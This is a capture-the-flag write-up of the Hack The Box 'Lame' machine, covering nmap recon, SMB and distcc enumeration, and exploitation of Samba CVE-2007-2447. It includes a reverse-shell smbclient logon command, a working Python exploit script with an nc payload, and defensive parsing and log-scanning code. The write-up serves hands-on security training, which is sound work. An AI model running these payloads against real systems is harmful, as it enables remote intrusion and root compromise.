
Hack The Box - Lame

Recon

Starting with an nmap scan.

# nmap --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:14 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.63s latency). 
Not shown: 996 filtered tcp ports (no-response) 
PORT    STATE SERVICE 
21/tcp  open  ftp 
22/tcp  open  ssh 
139/tcp open  netbios-ssn 
445/tcp open  microsoft-ds

# Full TCP port scan
# nmap -p- --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:14 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.59s latency). 
Not shown: 65530 filtered tcp ports (no-response) 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
3632/tcp open  distccd 
Nmap done: 1 IP address (1 host up) scanned in 133.07 seconds

# Full UDP port scan

#nmap -sU -p- --min-rate 10000 -oN lame.nmap 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:17 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.48s latency). 
Not shown: 65531 open|filtered udp ports (no-response) 
PORT     STATE  SERVICE 
22/udp   closed ssh 
139/udp  closed netbios-ssn 
445/udp  closed microsoft-ds 
3632/udp closed distcc 
Nmap done: 1 IP address (1 host up) scanned in 50.50 seconds


#nmap -sC -sV -p 22,139,445,3632 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:19 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.51s latency). 
PORT     STATE SERVICE     VERSION
21/tcp open  ftp     vsftpd 2.3.4 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230) 
| ftp-syst:  
|   STAT:  
| FTP server status: 
|      Connected to 10.10.14.2 
|      Logged in as ftp 
|      TYPE: ASCII 
|      No session bandwidth limit 
|      Session timeout in seconds is 300 
|      Control connection is plain text 
|      Data connections will be plain text 
|      vsFTPd 2.3.4 - secure, fast, stable 
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
| ssh-hostkey:  
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) 
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) 
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 
Host script results: 
|_clock-skew: mean: 2h29m43s, deviation: 3h32m09s, median: -17s 
| smb-os-discovery:  
|   OS: Unix (Samba 3.0.20-Debian) 
|   Computer name: lame 
|   NetBIOS computer name:  
|   Domain name: hackthebox.gr 
|   FQDN: lame.hackthebox.gr 
|_  System time: 2022-11-11T08:34:45-05:00 
|_smb2-time: Protocol negotiation failed (SMB2) 
| smb-security-mode:  
|   account_used: <blank> 
|   authentication_level: user 
|   challenge_response: supported 
|_  message_signing: disabled (dangerous, but default) 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

Our initial recon shows that we potentially have four different points of entry to this machine.

  • Port 21: vsftpd 2.3.4 (anonymous FTP login allowed)
  • Port 22: OpenSSH 4.7p1 Debian 8ubuntu1
  • Port 139/445: Samba 3.0.20-Debian
  • Port 3632: distccd v1
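
As an added example that is not part of the original writeup: a small parser for nmap's normal (-oN) output that turns the port table and the NSE script lines into records, then flags the exposures a defender would triage from a scan like the one above (anonymous FTP, SMB signing off, end-of-life Samba 3.0.x, a reachable distccd). The sample text is constructed from the scan above and trimmed; the finding labels and the rules in `triage` are my own and apply to any -oN file, not just this host.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the "-sC -sV" output from the recon above, trimmed to the
# port table and the script results the triage rules look at.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.3
Host is up (0.51s latency).
PORT     STATE SERVICE     VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
"""

# "<port>/<proto> <state> <service> [<version>]" as printed in -oN output
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    port: int          # 0 is used for host-level script results
    proto: str
    state: str
    name: str
    version: str
    scripts: list = field(default_factory=list)   # NSE lines attached to this entry


def parse_nmap_normal(text):
    """Parse nmap -oN text into Service records. Script lines ("| ..." / "|_ ...")
    are attached to the port line that precedes them; lines after
    "Host script results:" go to a pseudo-service with port 0."""
    services = []
    current = None
    for line in text.splitlines():
        line = line.rstrip()
        m = PORT_LINE.match(line)
        if m:
            current = Service(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), (m.group(5) or "").strip())
            services.append(current)
        elif line.startswith("Host script results"):
            current = Service(0, "host", "-", "host", "")
            services.append(current)
        elif line.startswith("|") and current is not None:
            current.scripts.append(line.lstrip("|_ ").strip())
    return services


def triage(services):
    """Return sorted (port, finding) pairs for exposures worth acting on."""
    findings = []
    for s in services:
        if s.port != 0 and s.state != "open":
            continue
        joined = " ".join(s.scripts)
        if s.name == "ftp" and "Anonymous FTP login allowed" in joined:
            findings.append((s.port, "anonymous FTP login enabled"))
        if s.name == "distccd":
            # distccd accepts jobs from any client when started without an
            # address restriction, so it should never face an untrusted network.
            findings.append((s.port, "distccd exposed"))
        if "message_signing: disabled" in joined:
            findings.append((s.port, "SMB message signing disabled"))
        if s.version.startswith("Samba smbd 3.0."):
            findings.append((s.port, "end-of-life Samba 3.0.x"))
    return sorted(findings)


if __name__ == "__main__":
    for port, finding in triage(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)):
        print(f"{port:>5}  {finding}")
```

The parser keys only on the port-line shape and the leading `|` of script output, so it also works on the full -oN files saved with `-oN lame.nmap` above; the triage rules are simple substring checks and are the part you would extend for your own environment.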

Enumeration

Port 21 (vsftpd 2.3.4)

Anonymous Login

Since FTP allows anonymous logins, I checked it, but the directory was empty.

A quick Google search shows that this version is famously vulnerable to a backdoor that is triggered by logging in with a username containing the characters “:)”. When the backdoor is triggered, the target machine opens a shell on port 6200. There is an nmap script to check for this backdoor, and scanning with it shows that this machine is not vulnerable.

#nmap --script ftp-vsftpd-backdoor.nse 10.10.10.3 -p 21 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 19:33 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.27s latency). 
PORT   STATE SERVICE 
21/tcp open  ftp 
Nmap done: 1 IP address (1 host up) scanned in 27.98 seconds

SMB - TCP 445

Anonymous Login

smbmap shows that only the tmp share is accessible without credentials.

#smbmap -H 10.10.10.3 
[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                         
        Disk                                                  	Permissions	Comment 
	----                                                  	-----------	------- 
	print$                                            	NO ACCESS	Printer Drivers 
	tmp                                               	READ, WRITE	oh noes! 
	opt                                               	NO ACCESS	 
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian)) 
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

After checking the /tmp directory with smbclient, it seems there’s nothing interesting.

#smbclient -N //10.10.10.3/tmp 
Anonymous login successful 
Try "help" to get a list of possible commands. 
smb: \> dir 
  .                                   D        0  Fri Nov 11 19:40:58 2022 
  ..                                 DR        0  Sat Oct 31 13:18:58 2020 
  .ICE-unix                          DH        0  Fri Nov 11 18:28:11 2022 
  vmware-root                        DR        0  Fri Nov 11 18:28:39 2022 
  .X11-unix                          DH        0  Fri Nov 11 18:28:36 2022 
  .X0-lock                           HR       11  Fri Nov 11 18:28:36 2022 
  5575.jsvc_up                        R        0  Fri Nov 11 18:29:13 2022 
  vgauthsvclog.txt.0                  R     1600  Fri Nov 11 18:28:10 2022 
		7282168 blocks of size 1024. 5386512 blocks available 
smb: \>

On checking searchsploit, we get some exploits for Samba 3.0.

However,

Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) 

seems interesting. This is CVE-2007-2447, often referred to as the Samba “username map script” vulnerability. On checking the module, the issue is in the username field: if we send shell metacharacters in the username, we trigger a vulnerability that allows us to execute arbitrary commands.

Going through the code shows that the module uses the following string as the username, where payload.encoded would be a reverse shell that connects back to our attack machine.

"/=`nohup " + payload.encoded + "`"
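
The underlying flaw is that the username ends up on a shell command line unquoted, so backticks inside it are evaluated before the map script even runs. As an added example, not code from this writeup, from Samba or from the Metasploit module, the snippet below puts that vulnerable pattern beside a hardened form (an allow-list check plus `shlex.quote`) and adds a check that flags such usernames in authentication logs. The `mapuser` script name and the `client=`/`user=` log format are constructed for the example and are not Samba's; the exploit title above gives the patched range (fixed in 3.0.25), so on affected versions the real fix is to upgrade rather than to rely on quoting.

```python
import re
import shlex

# Characters that change the meaning of a shell command line when a value is
# interpolated into it unquoted.
SHELL_METACHARS = set("`$|;&<>(){}\n'\"\\")

# Allow-list for a legitimate Unix/Samba account name
# (assumption: adjust to your own account naming policy).
VALID_USERNAME = re.compile(r"^[a-z_][a-z0-9_.-]{0,31}$", re.IGNORECASE)


def is_safe_username(name):
    return bool(VALID_USERNAME.match(name))


def find_metachars(name):
    """Sorted list of shell metacharacters present in the name."""
    return sorted(c for c in set(name) if c in SHELL_METACHARS)


def build_map_command_unsafe(script, name):
    """How a vulnerable caller builds the command line: the username is pasted in
    verbatim, so backticks or $(...) inside it are evaluated by the shell."""
    return f"{script} {name}"


def build_map_command_safe(script, name):
    """Hardened form: quote the argument so the shell treats it as literal data.
    Pair it with is_safe_username(); quoting alone still lets junk reach the script."""
    return f"{script} {shlex.quote(name)}"


# Constructed sample of authentication attempts in a hypothetical key=value
# format (not Samba's real log layout).
SAMPLE_AUTH_LOG = """\
2022-11-11 19:40:58 client=10.10.14.2 user=niraz result=ok
2022-11-11 19:41:03 client=10.10.14.2 user=/=`nohup id` result=fail
2022-11-11 19:41:09 client=10.10.14.5 user=$(id) result=fail
2022-11-11 19:41:12 client=10.10.14.9 user=backup result=ok
"""

USER_FIELD = re.compile(r"user=(.*?) result=")
CLIENT_FIELD = re.compile(r"client=(\S+)")


def scan_auth_log(text):
    """Return (client, username, metachars) for every login attempt whose
    username fails the allow-list; these are the events to alert on."""
    hits = []
    for line in text.splitlines():
        user = USER_FIELD.search(line)
        client = CLIENT_FIELD.search(line)
        if not user or not client:
            continue
        name = user.group(1)
        if not is_safe_username(name):
            hits.append((client.group(1), name, find_metachars(name)))
    return hits


if __name__ == "__main__":
    for client, name, chars in scan_auth_log(SAMPLE_AUTH_LOG):
        print(f"{client}: rejected username {name!r}, metacharacters {chars}")
    print(build_map_command_unsafe("mapuser", "/=`id`"))   # backticks reach the shell
    print(build_map_command_safe("mapuser", "/=`id`"))     # quoted: literal data
```

The allow-list is the control that matters: `shlex.quote` stops the shell from interpreting the value, but rejecting anything outside the expected account-name shape is simpler to reason about and gives the log scanner a precise signal.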

Port 3632 (distccd v1)

Googling “distcc v1” reveals that this service is vulnerable to remote code execution and that there is an nmap script that can verify it. Running the nmap script states that this machine is vulnerable.

#nmap --script distcc-cve2004-2687.nse -p 3632 10.10.10.3 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 20:11 +0545 
Nmap scan report for 10.10.10.3 
Host is up (0.31s latency). 
PORT     STATE SERVICE 
3632/tcp open  distccd 
| distcc-cve2004-2687:  
|   VULNERABLE: 
|   distcc Daemon Command Execution 
|     State: VULNERABLE (Exploitable) 
|     IDs:  CVE:CVE-2004-2687 
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C) 
|       Allows executing of arbitrary commands on systems running distccd 3.1 and 
|       earlier. The vulnerability is the consequence of weak service configuration. 
|        
|     Disclosure date: 2002-02-01 
|     Extra information: 
|        
|     uid=1(daemon) gid=1(daemon) groups=1(daemon) 
|    
|     References: 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687 
|       https://distcc.github.io/security.html 
|_      https://nvd.nist.gov/vuln/detail/CVE-2004-2687 
Nmap done: 1 IP address (1 host up) scanned in 7.66 seconds

Exploitation

1. Samba Exploit

Exploiting using smbclient.

#smbclient //10.10.10.3/tmp 
Enter WORKGROUP\niraz's password:  
Anonymous login successful 
Try "help" to get a list of possible commands. 
smb: \> logon "/=`nohup nc -nv 10.10.14.2 4444 -e /bin/sh`" 
Password:

and we get a connection back to our machine.

#nc -lvnp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 53095
whoami 
root

2. Exploiting Samba using a Python script

After Googling, it led me to this GitHub with a Python PoC for the exploit. We can get a shell easily by following the “install” instructions and then running the script.

But I wrote my own script, so that I can get some practice writing code.

import sys
from smb.SMBConnection import SMBConnection  # pysmb


def exploit(rhost, rport, lhost, lport):
    # Reverse shell; lhost/lport are our netcat listener
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    # Same username format as the Metasploit module
    username = "/=`nohup " + payload + "`"

    smb_conn = SMBConnection(username, "", "", "")
    try:
        # The session setup usually fails, but the payload has already run by then
        smb_conn.connect(rhost, int(rport))
    except Exception:
        print("[+] Payload was sent but something went wrong - check netcat !")


def main():
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print("[+] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0])
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)


if __name__ == '__main__':
    main()

Running the above Python script, we get a root shell:

#python3 lame-smb-exploit.py 10.10.10.3 139 10.10.14.2 4444 
[*] CVE-2007-2447 - Samba usermap script 
[+] Connecting !
#nc -lvnp 4444 
listening on [any] 4444 ... 
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.3] 39930
whoami
root

To get a nicer shell, we can spawn a pty:

python -c 'import pty; pty.spawn("bash")' 
root@lame:/#
This post is licensed under CC BY 4.0 by the author.
